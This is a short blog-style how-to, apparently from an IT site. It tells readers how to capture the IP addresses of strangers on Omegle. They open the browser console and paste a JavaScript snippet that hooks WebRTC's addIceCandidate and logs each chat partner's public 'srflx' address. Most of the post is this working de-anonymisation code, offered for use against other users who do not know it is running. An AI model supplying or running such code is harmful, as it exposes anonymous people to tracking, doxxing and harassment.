Computer NetworksNETWORKS

HOW TO GET PEOPLE FROM OMEGLES IP ADDRESS!!!

Steps:
Go to: https://www.omegle.com/
Press Control+Shift+I
Click on Console
Press Control+L or Just Click Clear Console
Paste this:
window.oRTCPeerconnection = window.oRTCPeerConnection || window.RTCPeerConnection

window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerconnection(…args)

pc.oaddIceCandidate = pc.addIceCandidate

pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)

if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)

}

return pc
}

Press Enter
Clear Console Again
Click Video or Text
Addresses should be on the right side of the screen

source

ip address

Alice AUSTIN

Alice AUSTIN is studying Cisco Systems Engineering. He has passion with both hardware and software and writes articles and reviews for many IT websites.

Leave a Reply

Your email address will not be published. Required fields are marked *